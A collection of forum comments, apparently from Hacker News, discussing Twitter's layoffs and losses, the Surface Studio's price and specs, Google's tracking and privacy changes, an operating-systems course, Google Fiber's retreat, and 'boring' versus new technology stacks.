No offense to the people I know working at Twitter, but these cuts aren't deep enough to stem the losses.

While Twitter revenue grew $664M, $1,403M to $2,218M over the past three years, it is going to be a lot flatter than that at the end of this year - and despite that growth they've consistently been losing about $500M p.a ($645M, $577M and $521M respectively)

3,800 people work there - and equivalent cuts last year can barely be noticed on the financials.

The good times are over - they've spent billions over the last few years and not done anything to save them from flat user growth. They really need a wholesale shakeup and doing it over time, like Yahoo did, will just make it worse.

edit: here's a more brutal analysis [0][1]:

> PS. Twitter staff - I am not exaggerating. Look at the young man on your left and the young woman on your right. Only one of you three will keep your job.

You'd think they would have figured out targeted ads by now. If I follow people who post about RF/Microwave, antennas, SDR, and ham radio, one would think I'd see ads from Keysight and Tektronix, but no, it's garbage like football and pop music. FAIL!

I also don't like that I don't see all the tweets from a person. They are pruning the timeline.

Twitter is by far the #1 service I use everyday. It's been the most valuable to me from a networking perspective where I've made friends and professional connections. I also happen to be a shareholder. It's been disappointing to watch Twitter try to become a business and completely falling flat.

The acquisition of Vine and Periscope haven't led to much and the user growth from Live video is still t be seen.

The product is immensely complicated compared to something like Instagram or Snapchat. It manages to be everything and nothing at the same time. I've been a fan of Jack Dorsey's work at Square but monetization is a complete different animal in that industry.

To summarize I just don't know what the future of Twitter as a business will hold but I guess I'm here for the ride.

Can we talk about Fabric again? Fabric [1] is a product done by Twitter but heavily de-emphasizes the Twitter association -- it's a value-added Twitter SDK that apps can build into themselves and get crash reporting (ex-Crashlytics) and ad network integration (MoPub) too.

In the scheme of Twitter's self-reflection trying to figure out how to cut costs and find what it wants to do, do you feel Fabric fits into it? Do you feel the 'core platform' i.e. the microblogging site fits into it? Should the less strategic one of these be spun out; or should they be less separated?

Apart from killing their third-party ecosystem, I think Twitter's biggest failure has been their inability to monetize their huge celebrity and brand base, and I wonder if this partly has to do with their "verified account" system. How to charge celebrities/brands without pissing everyone off?

Top-tier celebrities and brands can and would easily fork out high fees to use Twitter. But Twitter can't just charge some blanket fee to verified accounts because right now, "verified accounts" are not exclusive enough. They also include "key influencers", bloggers, industry people, other hangers-on (let's call them Group B) and they can't/won't support the high fees and would revolt.

Twitter could try and create a new way to categorize celebs/brands, but that would confuse things and may make Group B users feel less elite: so they'd revolt as well.

I've thought long and hard about why I believe Twitter as a service isn't very valuable to me and I thing I've come up with the answer. Twitter is great at delivering live information. If I'm following my favorite artist on twitter then I know immediately when his album drops. However, that one important tweet that matters to me is mixed in with a 100 other tweets of people I follow retweeting or posting irrelevant things. For that reason the situation in which Twitter truly shines for me (instant, up to date information) is overshadowed by the fact that many people also use Twitter to post funny things which I don't care about.

My sense is that while Twitter has been able to hire some very talented engineers (incl. but not limited to those I know personally), the high-level technical leadership hasn't been particularly successful.

Is there room for an independent 'moonshot' team reporting directly to the board?

Wonder if Twitter will end up like Delicious. Even with Pocket, Diigo and such, I'm not sure what people use to save bookmaks these days. Delicious went through several hands, Diigo was almost there but their bookmarklet doesnt let you know if you already have something tagged. Delicious abandoned their FF plugin and so its basically not worth using the site anymore.

I'll be honest, I wont miss Twitter if it dies out, as I'm not a user. The thing I hate is how Twitter killed RSS for many browsers and users. So if Twitter dies, so be it for causing that to happen.

I can always tell when Twitter is in trouble, because I get a security notice from them that there has been suspicious activity on my account, it has been locked, and I need to login with an assigned password. (I never use my Twitter account). Happened after the last quarterly earnings report and also yesterday.

In other words, "We need more active users, so please log in soon so we can count you as an active user."

I don't really have any insightful input into this other than to say, I hope they're cutting the people they most likely don't need.

Twitter is the only social platform I actually like and still use, and the only thing that could replace it would be similar but decentralised and as widely adopted.

Why / where are they failing - are they failing? I know more people on and using Twitter than ever, many of those have left other aging social networks after finding them irrelevant or too invasive of privacy.

Twitter is simple, Twitter is what it is and it doesn't try to be more than that, it does what it does well and it always has done. This - I enjoy in a product.

Came here to say that I love Twitter and am online on it far more than on any other service.

I even clicked on its served commercials, because Twitter has my professional network and managed to score some ads that triggered my interest, versus on Facebook where I have a list of friends and acquaintances with which I've got little in common with.

Their problem is their ad inventory and their targeting. They should serve more ads and improve their targeting.

One of Twitter's problem is not properly controlling their feed. I never use their mobile or web client. I solely use a highly customized Tweetdeck. With this experience, I never once see an advertisement. That's a huge loss for Twitter.

Perhaps it's just me, but I wouldn't have a problem seeing advertisements in my Tweetdeck feed if it meant they'd remain successful. I'd much rather see Twitter succeed as it's the only platform I use to keep up with thousands of professionals and news sources. It's entirely a different experience than Facebook.

I think the Twitter community should suck it up and accept the fact that they get served a couple of advertisements in order to support a news service and contend delivery network unlike any other in existence.

Something I've never been able to wrap my head around is how does Twitter make money? I mean real money. Not valuation of eyeballs, not VC cash, but honest to God profit? It has always baffled me and I wish I knew what the unicorns say to the VC's when (hopefully) someone asks this question.

I feel like a takeover is only a matter of time. If you're Alphabet or Facebook you're probably interested (I'd say Alphabet should be more interested, for Facebook it's probably mostly a blocker play). The question is how long do you let them "rot" to drive down the acquisition price?

I'm just back from a holiday in south east Asia. All the time I was there I was getting ads on twitter targetted to the local market (in the local language) presumably based on my roaming IP.

Maybe my grasp is a bit simplistic but isn't this just intensely stupid? My twitter profile is explicitly Western European is twitter's location based advertising really just as dumb as matching IP addresses to regions?

If I were an advertiser I wouldn't be too happy about twitter claiming 'impressions' like this.

Twitter lost the trust of many users and are now suffering the consequences. It was once supposed to be the place for the freedom of speech and truth and is now just another arm of the left-leaning politicians in the US.

So many conservative/libertarian political figures and personalities have been permanently banned from Twitter in the last year for only posting an opinion that it can no longer be chalked up to circumstance.

$2,999 and the best GPU option is a last-gen mobile card? The default 965M is a crappy budget card (half the performance of the 980M), and if you want the 980M you have to pick the $4,199 configuration.

And hybrid drives!? This thing starts at $2,199 and you can't even get a full SSD? I know 2D designers probably won't mind the GPU, but they could definitely benefit from a true SSD.

Hell, the recently announced Razer Blade Pro has top of the line everything (including a desktop GTX 1080 GPU, 1TB SSD, and 4K screen suitable for photo/video editing) and it still costs less than the 980M Surface Studio: https://www.wired.com/2016/10/razer-blade-pro-laptop/

I must be missing the value proposition here because that price seems absurd, especially for a computer presumably geared towards professionals.

That looks pretty awesome, and it makes the iMac seem even more tired which I assume was intended. It is startling to have a story about IBM extolling the virtues of Macbooks for business and Microsoft launching a platform targeting designers, it really is amazing. But setting all of that aside for a moment....

The screen. Clearly that is the thing which makes this announcement. For me, the 3:2 aspect ratio is so more reasonable for computers than 16:9. And having a zillion pixels is wonderful although my CAD package (TurboCAD) still doesn't deal well with the high DPI screen off the Surface Book, I'm sure it would look silly on this machine.

My experience with the Surface Book tells me that the PixelSense technology is really great for drawing. I have both it and the iPad Pro and not too surprising, at twice the cost, in my opinion the Surface Book's drawing experience is better than the iPad's. I base that opinion on precision of the drawing, expressiveness, and the response time.

Touch. Microsoft is really doubling down on the whole touching thing and so far Apple has stayed away from it with its compute platforms. That is both a strength and a weakness. The rest of the ecosystem doesn't always understand what to do, so you get controls that are too small to use your finger on sometimes, and odd sort of multi-monitor experiences where things appear on one screen and then when you resize them they jump to the other and try to adjust for "touchiness".

If the tools people can get their act together, and by that I mean the designer tools (I for one would love to see a schematic capture and board layout system that was touch enabled and pen enabled) then I think it is only good news for Microsoft, if they can't, then Apple will look really smart at not adopting a "gimmick".

I can't but feel sad that Microsoft somehow is dropping the ball on mobile despite them having been, briefly, in a prime position to succeed. They've executed well with their "One platform"-strategy. UWP is great and with the new composition API their finally moving into being able to compete in the modern software arena. Meanwhile on the hardware side Panos is basically doing what Apple should have been doing if they had any creative leadership left... but it doesn't matter, for some reason they've seemed to abandoned mobile despite having all the pieces in place.

Their mistreatment, lack of support and quality assurance of the mobile side of the platform has been dismal. It's very weird, obviously they can do hardware, they have the ecosystem to back them up and the API teams have been doing some great stuff when it comes to w10, yet they've seemed to given up on mobile.

I must say I don't understand it, how can such a big player as Microsoft abandon such a strategic area of their ecosystem? I understand that it's hard to be a profitable in the harsh reality of consumer electronics and that the money is in business... but yet, if you're not in mobile you're leaving a gaping hole in your ecosystem that leaves the other parts vulnerable. I don't understand why they don't simple pour resources into mobile with the same enthusiasm as tablets/laptops and gaming.

At first I applauded Microsoft for continuing to advance the desktop computer market. This is something I wish Apple would continue to invest in but is clear they're moving towards building machines for the engineers to build iOS software.

However then I jump into the Microsoft store and check it out...

$4,199.00 for the high-end option gets you a hybrid drive, probably connected over an older SATA bus and a graphics card from last year? USB 3.0 only and no Thunderbolt?

Is this a system that was designed last year and it took a full year to get to production?

Sorry if I'm being bitchy, but to me this is typical Microsoft only going the 80%.

With its Subsystem for Linux aimed at developers and now this desktop PC for designers, it seems Microsoft is quickly catching up with Apple. Now if they could release a good alternative to the MacBook Pro that would be great.

I'm not sure why you need the world's thinnest LCD for a desktop, it's not like you'll be mounting it on a wall or something.

By the way, that presenter is a pretty good actor, but he was trying way too hard in a way that was distracting. The way he called out someone in the audience at one point made it seem like he has standup comedy experience and was trying to connect with the audience but it made no sense.

Nvidia GTX 9xxM - from what I understand 10xx cards offer the biggest difference in performance generation-to-generation seen in a while on the mobile side - the 10xx mobile versions are basically identical to desktop versions, 9xx are not even close - so why put last gen mobile tech in to a high end professional desktop product ? Especially considering the likelihood of VR proliferation in content creation - I couldn't justify buying this just because of that considering the price tag.

As a software eng. this is not something I need. I have realized that because computers are designed and programmed by engineers, we had what we need from the very beginning. I am glad that now its designer's turn to get some tools.

Great hardware, interface ideas look really interesting too. This could actually be some vision that can get mainstream in the future.

I would seriously consider buying one, if not for one thing - OS. After recently installing Windows on Bootcamp I can honestly say that I hate the thing. It made me swear constantly for 15 minutes. I wish MS finally wrote a new OS from scratch. They seem to have the right idea about where to go, but Windows looks like a 40 year old after series of plastic surgeries - it's supposed to look young and modern, but after you get passed the surface you can see all those menus that are almost two decades old.

I probably won't buy one of these, just as I didn't buy the first iteration of the Surface, but will definitely consider future iterations. If anything, these products greatly boost my estimation of Microsoft as a brand. If I were still more in my photography/design days, I'd have a hard time resisting buying the Surface Studio (assuming its reviews aren't disastrous. For the past decade I hadn't contemplated buying anything else besides Apple when it comes to PCs. Microsoft has made a great case for how much innovation can still be done in this field.

The feedback I am seeing for this product seems generally positive even with a lot of delight from some corners. It will be interesting to compare the feedback for this against tomorrow's feedback regarding the Mac announcement, a pillar of which seems to be the bar they've added to the Macbook Pro.

If I could get this screen (along with it working with the pen and the other accessories) but hook it up to my existing desktop I would be all over it. Even if it was still $2,200. But a 980M is just not going to cut it as my primary graphics card...

I can kind of understand the need for non-upgradable phones and laptops, since they are more useful when they're thinner and lighter. But stationary devices like this and Apple's iMac are unnecessarily wasteful.

As a side note, it's amazing to see that despite everyone ragging on apple and claiming superiority to them, they all copy their advertising style.

The copy on the google pixel site and this site are both very obviously apple-ish.

edit: down vote away, doesn't change the fact that these websites scream "we want to be apple". Though I will say, the tides are changing for apple judging by the amount of people hurt by this comment.

A shame the OS is just terrible. Windows 10 is so hostile to me as a user, constantly pestering me about updates or missing DLL files. Bleh. I installed Plex in January, today after not booting my machine for about a month, I wanted to watch a video and got some random DLL missing.

How a DLL can go missing while the box is turned off is a mystery to me, but there you go. I don't trust my Windows box.

I don't understand who this product is for, someone who is not a PC enthusiast but has 3000$ to spend on a PC? I guess the target audience is like high end design studios that need to outfit their stylish new office with matching computers that no one will ever use because all the real work happens at home on people's macbooks at home.

That said I love the dial thingy, I think it has some great ideas behind it and is potentially also a nod to the incredibly popular Griffin powermate which I believe is still a popular product.

$3000 for a machine with anemic specs is going to be a tough sell. Who exactly is this computer for? As for that puck device - I couldn't help but laugh when the presenter, dressed in all black as if attending a funeral, used it to emphasize how passionate his scribbles were on a document. Who does that? Who would ever do that? And more importantly, who ever thought this would be something you would even want to devote time to demo?

The marketers and advertisers have finally won. Google hasn't been an engineering company for the last 5 years maybe, but this confirms it. It's like Facebook, they're beholden to the non-developers and non-software engineers who frankly don't care about other people's privacy and only see the dollar bills.

So glad I'm evaluating other email providers and use Privoxy for ad-blocking.

I'd just like to draw people's attention to a little bit of conflict-of-interest research some Stanford University researchers published a few years ago:

Currently, the predominant business model for commercial search engines is advertising. The goals of the advertising business model do not always correspond to providing quality search to users. For example, in our prototype search engine one of the top results for cellular phone is "The Effect of Cellular Phone Use Upon Driver Attention", a study which explains in great detail the distractions and risk associated with conversing on a cell phone while driving. This search result came up first because of its high importance as judged by the PageRank algorithm, an approximation of citation importance on the web [Page, 98]. It is clear that a search engine which was taking money for showing cellular phone ads would have difficulty justifying the page that our system returned to its paying advertisers. For this type of reason and historical experience with other media [Bagdikian 83], we expect that advertising funded search engines will be inherently biased towards the advertisers and away from the needs of the consumers.

A recent podcast (TAL? Radiolab?) just discussed the retreats Google has made over time with respect to privacy and intrusive advertising. I tried to find it - someone have a link? This very much continues the theme. It is important to note how much Sergey and Larry hated advertising and the belief they held that any advertising based search engine would inherently corrupt itself.

For people who didn't read the article but want to opt out of this tracking:

To opt-out of Googles identified tracking, visit the Activity controls on Googles My Account page, and uncheck the box next to Include Chrome browsing history and activity from websites and apps that use Google services." You can also delete past activity from your account.

It all serves to make me happy that I'm using Firefox with uMatrix as my daily driver, and only use Chrome (with uBlock Origin) for the rare things that I can't get to load properly because of all the cross-site dependencies.

Google seems no better than Facebook when it comes to privacy, and I'm not just talking about how far they're willing to go in tracking users, but also how they are willing to lie and violate their users' trust so they can collect more data.

Facebook is now getting into trouble in the EU for breaking their promise about not sharing WhatsApp data, and yet Google still goes ahead and does this. I hope the European Commission adds this as one more charge against Google.

Without real enforcement the companies will continue to do whatever the hell they want.

1) Does not track user activity. Hosted in Canada.2) Does not leak referrer to visited sites3) No ads. Will be considering affiliate links, a paid API,and/or "good" ads -- ads people want that don't compromise privacy4) Integrated feed reader which also provides search results5) Activation codes (like DDG bangs, so ?g instead of !g)5) Plugins written in JS/data to be searched can be added at any time.6) Deep search -- get results from the search results page of several sites at a time. Try https://solveforall.com/answers.do?q=rx+480&client.kind=web&...

There clearly a lot more work to be done, and I plan on open sourcing this soon, but please try it out and let me know any feedback you have!

I use google and have chosen to give up a lot of my privacy to use their services.

One thing I was never willing to do though, and I had an instant emotional reaction to not doing, was allowing them access to all my email.

They can have my GPS coordinates at all times, my web search history, etc, but they can't get into the inner workings of my life and my thoughts.

So back before I had any real use for it I just registered myname@myfirstandlastname.com and used that for my email address. It felt like a natural move. It does bother me still that a lot of the people I email do use gmail, so google still ends up siphoning of a lot of the contents of my email.

I see a lot of people talking about FastMail instead of GMail, but I don't know why more geeks don't register their own domain name which has several advantages (including looking better and more professional). The one downside is that mail search sucks. I'd love to get some decent search without giving up privacy somehow.

More and more changes that do not bode well for google, first they changed it to where they can track what numbers you dial, then they tried that with your google chrome history and tabs if you synced it to your account and now this? People wondered why i stopped being a google evangelist after 2014.

This is yet another reminder that it's important, especially for HN readers, to continue to give support to groups such as Mozilla and their Firefox platform. The more widespread Google and Chrome usage is, the more Google can push these changes with little to no resistance.

Does anyone know the specifics of Google's privacy practices for G Suite (formerly Google Apps for business)? They claim no advertising, but do they use your data for anything else, and do they still build shadow profiles? If you're already buying 1 TB of storage for Google Drive, then you can instead sign up for the $10 month G Suite plan and get 1 TB of storage with ad free versions of their apps.

I think duckduckgo often becomes an alternative that isn't an alternative, in the sense yes its there, you are frustrated with Google's behavior and you persist for a whole day and then have to revert back to Google with tail behind legs so it's more of an alternative in name.

With the sheer scope of Google properties there is always going to be a tempation for 'value searchers' within the organization to give in to dark patterns and compromise users. I have been trying Yandex search and email and its fairly decent. Email is good, search appears to be a much more serious offering compared to duckduckgo but still some way to go.

However we need diversity and decentralization to prevent concentration and inevitable abuse of power.

I expect google will experience outages >15 minutes for core services in the comung months. This is based on significant uptick in ddos sophistication, this has been referenced by Schneier-- although not in ref to Goog.

If changes like this announcement convince people to move away; I am all for it. This just proves not only their power, but the danger of a single point of failure.

As for now, there is no viable alternative to Google. There is no distributed, free independent search engine that provides such quality relevant search results as Google, and is caring for users privacy.

I do not think either it is financially possible to run such a thing, without someone's vested interest in metadata behind such possible endeavour. There is silent demand for such an effort however.

I wasn't expecting much at first as an OS professional, but wow this is great! Flipping through the slides, it's just the right amount of info and context to develop a working knowledge and vocabulary without much time investment or getting overwhelmed or losing interest. Didn't look at the videos or assignments yet.

If you work in some type of ops role this will really accelerate your career.

If you are a programmer and forgot or did not take an OS internals class, ditto.

You will not unlock maximum throughput, minimum latency or a balance without understanding these concepts.

Thanks for posting this. I was looking for more operating system courses. I'm currently watching Kirk McKusick's FreeBSD Kernel Internals course [1], which isn't available for free (the first hour is [2]), but I thought was worth the money. I find is really amazing that I can watch a course taught by someone who is such an expert in UNIX-like systems.

Along with a general in-depth OS course, I would like to find a Linux-specific course. Does anyone know of a good Linux internals course?

UNIX-like kernels are easy, in that you don't have to have that much running before you can run "Hello World". I'd like to see more on microkernels. You have to have more pieces running before you get to "Hello World".

Also, the emphasis on virtual memory and page faults is becoming dated. Paging out to disk is obsolete technology. RAM is too cheap, and mobile devices don't page.

The professor who made this class is leaving UB next fall. I'd be lucky to be able to attend this one last course under him(the class is gonna be a full house this time) before he moves out of UB, a sad event in itself :(

I have to say - the course is very well organised. For me atleast, the structure and flow is exactly how I approach my learning. A video overview -> a though provoking discussion -> the problems -> hints -> academic paper -> solution. Neat.

This is godsend! Today I found some final notes and resources over the internet, wanting to put my C/C++ skill to good use and build and learn something. Always was attracted to OS (having OS class in a year but I couldn't wait), so thanks for sharing this so much! Can't wait to get started tonight!

That sucks for citizens of the US. I think the Swedish (Nordic?) model for bringing internet connectivity to it's citizens is superior.

The municipalities own (most of) the networks and all the fiber cables, letting companies use them for a small(ish) fee. These companies later sell it to customers. This help people to get the best deals and ensure that the networks are continually upgraded.

For example, I have 250/100 mbit/s for free. My rent pays for this. But I could if I wanted to easily upgrade to 1gbit/s up and down. I can change ISP (even if that wouldn't be paid for by my rent) and I would know that I always could get the same internet-connectivity speeds.

Although, while this is true for many parts of Sweden, it's not available for everyone. Some places still have networks owned by one company without any access to the city network.

Forgive me if I'm incorrect... The way I understand it is that they are halting planning in cities that they marked as potential locations, but that does not mean they are discontinuing the roll out and service in cities that are already in progress.

For example in Nashville, they have been trying to roll out fiber in Nashville for over a year now but have only been able to install on less than a dozen utility poles so far.

This is because of the rules that prevented anyone other than the owner of the existing lines to move anything. This meant that if Google wanted to add lines to a pole with existing AT&T and Comcast lines, it would require both companies to move their own lines independently of each other in coordination. This means roads would have to be closed 3 separate times for each vendor. Nashville recently passed the One Touch Make Ready ordinance that allows approved vendors to do all of the work at the same time.

Well google announced they were exploring a fiber rollout in Chicago. Now both AT&T along with Time Warner Cable have 1G service throughout parts of the city.

Alternatively, one can look at this not as a failure, but as a success. The point of Google fiber was to force carriers to get faster internet to everyone. It appears that it has been working. This benefits google directly as their properties such as Youtube can deliver more and better content.

So bummed to read this. Even though I wasn't going to directly benefit from Google Fiber, it was sure nice to have a non-entrenched player tackle this market.

From the big G's standpoint, it makes good biz sense to exit this market. I sure hope the subtext in the article comes to fruition ie that Google / Alphabet has figured out a better way to get high speed internet to homes in the US sans fiber.

In an ideal world, this fast fiber internet ought to be a municipally managed utility, with my tax dollars paying for the fiber in the ground. Then, my take home dollars paying for whatever competing service(s) I choose to light up said fiber to bring me access to the net.

The title of this post is pretty deceptive it clearly implies that the Fiber project altogether is being halted.

My understanding from this article amongst others is that they are simply rethinking their approach to, rather than laying down fiber throughout all target cities, beam high speed internet from local way points to the roofs of high rises (like WebPass does in SF, which they acquired).

It is pretty reasonable to, if this seems a viable approach, halt expensive infrastructure operations to lay down hard wired fiber and cut the jobs associated with these logistics and operations.

See this title about what's happening to Google Fiber is much more direct, honest, and to the point than the corporate PR google Post and title that confused me into thinking I'm actually going to be able to sign up for Google Fiber.

Their title: "Advancing our amazing bet"

Point being that our ISPs right now need some disruption and I think a lot of people were hoping this Google Fiber would catch on. A lot of folks assumed Google would eat whatever losses to make this a hit. Apperatnly not, apperantly some short term profits trump anything else.

GF has been tearing up our neighborhood this week and last laying cable (I'm in Chapel Hill). AT&T did the same about 6 months back. I was holding out for Google, but this makes me think even when they get it up and running, the support will be nonexistent. So maybe better to go with the devil we know (we already have AT&T U-Verse, just not gigabit). At least they lasted long enough to force AT&T's hand...

They backed out of Portland after spending a ton of money and time with city officials. Sad to hear this is not happening and hope Google finds a way to get back into this because the options today are a joke. This will just embolden companies like Comcast to charge more for horrible service.

I wrote about this elsewhere and am pasting my thoughts here as I think they're relevant to this community:

1) Google Fiber is dead. Long Live Google ISP.

Google cannot afford to lay fiber in the ground because it's a long game and Google doesn't really want to play the long game (they just want to put pressure on competitors so they can move more bits along the wires, generating more searches and more streams with which to shove ads in your face). Fiber never was the most efficient way to do this, but there's something sexy about "Google Fiber" as opposed to "Google Point to Point Radio Towers". The reality is that wireless delivery of bits is way cheaper than fiber because you don't have to tear the ground up (over the last mile obviously since the arteries must be fiber links).

Clarification: "long" refers to 30-year payback periods for physical asset investment. There are a lot of things with higher returns on that timeline than fiber that google can invest in. I don't actually think it's profitable for anyone to build unsubsidized networks. This is why networks should be public and operators should be private, but that's a topic for another day!

2) Fiber is cheap, construction is expensive.

When I helped Comcast build out the fiber network in SF, what struck me was the relative cheapness of the assets we were putting in the ground compared to the cost of tearing up the street. The conduit and the glass inside the conduit cost almost nothing, but tearing up the street in SF is $300/sq ft. Crossing cable car tracks was like $50,000. Then there's the actual cost of construction: people. Getting contractors to arrive on time, finish on time, and avoid overtime is fraught with peril. It's actually really hard to move physical atoms around in a manner similar to programmatic systems, and so many models that have real world elements stumble against the harshness of actuality. I suspect Google's cost modeling for building a fiber network was optimistic.

3) Wireless is fast, but does it scale to city size?

It's not hard or particularly expensive to deliver gigabit over wireless. You basically need a tall building to rain down radio waves onto the masses. What I wonder about, given that we have no cities running on majority wireless point to points, is what happens when you hit scale? That is to say, point to points have a limited wireless footprint (because using beamforming we don't need to splay the signal everywhere, we just send it in one direction), but one can easily imagine a saturated wireless environment as generating a significant amount of noise. Wireless networks are easy when there's only a few objects on the network but get significantly harder as the physical area reaches device saturation. That is to say, WebPass might be super easy to operate when only a handful of buildings are on WebPass, but it might be much harder if a whole section of the city is online.

4) Google bought WebPass a while back.

The writing has been on the wall for a while that the fiber game was killing uncle Google. I can only hope that they don't bow out completely. I think that wireless makes Google significantly less of an existential threat to their carrier partners as well.

Overall, I remain cautiously optimistic about Google's future as an ISP.

On a final note: Google Fi is not an answer to Google fiber disappearing. The two are tangential, disjointed offerings that cannot, for a bunch of reasons, compete with one another (most notably the wireless data caps).

The Google Fiber rollout in my neighborhood has been a debacle from the start.

They walked around and put up door tags -- really really big ones saying, "Google Fiber is coming!" and immediately after that the 0 crime neighborhood I live in had a slew of break ins. Anyone who didn't remove this massive door tag was an easy target, the crooks knew who was home and who wasn't.

Then like a week later... they put the exact same door tag up on all the doors. And we all laughed... but we were like, "WTF, Google..." Then the next day they put the exact same door tag up again... even doubling it up on homes that already had a door tag. They door tags were just promos to sign up; they didn't tell us to mark our sprinkler systems, or who to call in case the construction crew accidentally cut our water lines...

The actual cable laying came about a month later... and it's been going on for 7 weeks at this point. Some days the guys work, most they don't. Doesn't appear to be any pattern to it. There are a bunch of expensive drilling and trenching machines parked at the end of my cul-de-sac and along the street in the spots where residents used to park. 7 weeks and counting...

I think it's hilarious how many people think it's consistent to simultaneously hold the opinion that this is a tragedy and that Google Fiber was the ISP that they wish they could have, while also supporting federally-imposed "net neutrality" and the implicit claim behind it, which is that all ISPs are just dumb pipes that are moving bits, and that consumers are agnostic about who does it.

All the sheep on Reddit who got behind FCC mandated "net neutrality" are directly responsible for this. Urbanites get a warped view of this country and vastly underestimate the amount of places where satellite internet is their only option. Yet they have the nerve to bitch and moan about what a tragedy it is that they can't stream 4k video without buffering. The government must fix this! To hell with the rural schoolchildren and their lack of access to wikipedia, I want to watch high-def cartoons!

There was so much innovation taking place behind the scenes to provide a decent web-browsing experience via satellite internet and WISPs. And it's all for naught.

This what I like to call "both/and". I like both the old reliable and the new shiny. So often people want things to be "either/or". Either I'm going to use this solution or that one.

The key is to know the context of each, and I think this article does a very good job of describing when each ought to be used. He uses the boring reliable stuff on his own things, because he is beholden to no one and does not need to justify his decisions. And he also works with the exciting new stuff with clients, because it is simply easier to sell it to clients who are caught in the Silicon Valley echo chamber.

Both/And is like trying to hold a small bird in your hand: too tight and you'll crush the bird and it will die, too loose and it will fly away.

I often hear this sentiment that new languages and frameworks du jour pop up every week, and that past an age a fellow just wants to learn a single reliable stack and collect a weekly paycheck.

Am I the only one who just hasn't experienced this feeling? There used to be Rails/Django and jQuery. Now there's Node and React. Both revolve around extremely simple ideas. Spend an afternoon reading the React docs, and you'll know everything you need. Take another afternoon after that and learn Redux. If you have another few afternoons, learn Clojure, and see what the Lisp folks have gotten going with reagent/re-frame. There isn't that much to keep up with.

It's the same with complaints about JS having too many transpiled dialects. These dialects make life easier. There are good ideas in them. For example, Livescript is wonderfully concise and elegant, at no cost of readability once you grok Livescript. It makes your code more readable and faster to write. How is this a bad deal?

I sometimes wonder if people are just annoyed that they need to learn new paradigms at all. It's not like ours shift at an especially fast rate.

Well, I don't know if "boring" is the word I'd use, but I like _transparent_ stacks: if I make a mistake, it tells me where I made a mistake in a way that I can interpret. All of the "boring" stacks have this property.

omg this guy is on spot. My day job is Magento (hell), but I am absolutely in love with boring ol' C#, along with the new ASP.NET Core framework & Kestrel web server. All of my side projects are built using C#, and I don't use jQuery or Angular or React or Reactive. I use plain old vanilla javascript, because I care about zero HTTP requests & zero bloat & zero BS.

It's a great point--it just seems arbitrary to draw the line in the sand of having a "boring stack" that consists of SQL Server and C#.

I mean, that, as a minimum, means you're running and maintaining a Windows server, along with antivirus, backups for the OS, and backups for the database. Any time Windows updates come along, your service will be unavailable. Every couple of years, you'll need to buy a new license, upgrade Windows, and make sure everything comes up smoothly. This likely will involve fixing and troubleshooting some issues. You'll need to have some monitoring set up to make sure you don't end up running out of disk space on Saturday morning.

Or maybe you have more than one Windows server (to avoid downtime from a single server), but that makes your stack decidedly less "boring." Now you're dealing with at least a load balancer and making SQL Server redundant.

I mean, I guess it's more boring than chasing the latest front-end reinvention or maintaining MongoDB, but there's some room for improvement here, clearly. Containerized deployments (via Docker or a "serverless" architecture) might be able to help.

I agree in general but why would you use Windows/SQLSrv for internet-based products? I'm fine with it on the desktop, but the extra costs and time devoted to things like activation are a non-starter as far as I'm concerned. I believe they finally have ssh and package mgrs available, but don't you still have to install them manually?

There's plenty of boring stacks on Unix that are free, in both senses of the word.

This is how I feel. I have friends that are always going on about all the latest "best practices" and cool hipster stuff like docker swarms and microservices. Meanwhile I've kept my own projects using boring old (or rather tried and tested) technologies and languages like python.

I don't like it when people are recommending new buzz words every week.

If you mean "familiar" then you're right: something you know is better than something you don't. (But it's not the way to learn or expand your horizons.)

If you mean "stable" then the whole thesis is a bit of a tautologycrucially, there's no fundamental contradiction between "new and shiny" and "stable", and "boring" stuff is often also unstable/insecure/bug-prone (think PHP or C).

If you mean "popular" or "mainstream" then you're putting way too much stock in the judgement of crowds. Crowds and fashion are fickle and the popularity of a product is a poor indicator of any intrinsic qualities.

I've seen people using all three of these definitionsand linear combinations thereofwhen talking about these things. More too, probably.

I think it's important to separate them out exactly what you mean by words like "boring" or "practical" when talking about software tools and abstractions to understand exactly what's going on and to communicate clearly.

I agree. Kind of. You get to choose the kind of problems you work on, and the way you break up your time. If you want to innovate on the infrastructure, if you find that interesting or if worth the gains for the kind of scenarios you work on then go for it. At the same time focusing on solving problems in the programming infrastructure, spinning cycles learning new techniques means you get less time actually solving problems in your actual problem domain. You don't need a $3000 carbon fiber road bike to get to your friends house down the street, no matter how many articles you read about how good that road bike is. I suppose the idea is use the most boring stack that can get the job done.

I've flipped-flopped back and forth several times over the last 15 years on the question of server-side vs. client-side view logic. I literally start each new project with a new technical review and evaluation of this question.

I'd have flipped permanently to client-side if the quality and consistency of the JS stacks were of the same quality as the server-side stacks (I use ASP.NET MVC). I know that it has been a rapidly evolving thing and hence the churn. But here's the thing - with software I've come to prefer intelligent design over Darwinian evolution. On the server-side we have intelligent design; on the client we have evolution. On the server, we have stability and a roadmap. On the client we don't.

With that said, painting pages on the server to send down to the client just doesn't smell right anymore.

I personally enjoy the new & fancy. Infact, I try the new stuff because I enjoy trying it out, and the "gotcha" moment with that happens when you understand the stuff.

That said, If I had to choose a tech stack for work, I'd choose something that I am comfortable with and something that I know a lot about (compared to the rest of the stuff available) - because in the end, it's not about having new and shiny so I can blog about, but to solve the problem that my company is facing/trying to solve.

"Good old C#, SQL Server and a proper boring stack and tool set that I know won't just up and fall over on a Saturday morning and leave me debugging NPM dependencies all weekend instead of bouldering in the forest with the kids."

Microsoft tax.

Yes you can get alternative C# implementations [0] but SQL Server? Having to deal with "MS Tools" in an era of high quality alternatives? Boring for me would be Perl/Postgres, both in their 20's, solid, reliable, with plenty of quality developers and language support.

I'm in between jobs and thinking of starting a SAAS on the side in order to support my goal to go backpacking for a few months next year.

However, the amount of microservices I'm thinking of putting it all together with means it'll require a decent amount of non-automatable (as far as I can tell) maintenance and attention. This isn't exactly what I want at the back of my mind all the time while travelling... but then again, you can't have all your cake and eat it.

Anyone who has a successful hands-off SAAS built on a modern stack care to chip in on ways of mitigating this?

I like the point about building systems that take care of themselves and are largely hands-free. I'd say that applies regardless of platform (or "shininess"), though. The author has clearly internalized one of the more important lessons in engineering in terms of designing for maintainability (with an ultimate goal of zero/low-effort maintenance and/or extension).

I'm not sure the platform itself is as important to achieving this goal so much as the decision-making ability of the engineers themselves, though. Maybe a tendency to pick shiny because of shiny is just a way that poor decision-making surfaces? However, I don't see a problem picking an appropriate solution that happens to be shiny.

MS SQL Server is so awful crap, you can just try any another DB to see that - I can't trust this author after "good old SQL Server". And I don't see nothing except boring oldman grunting in that article. Programmers should always learn and they know it from the beginning of their way.

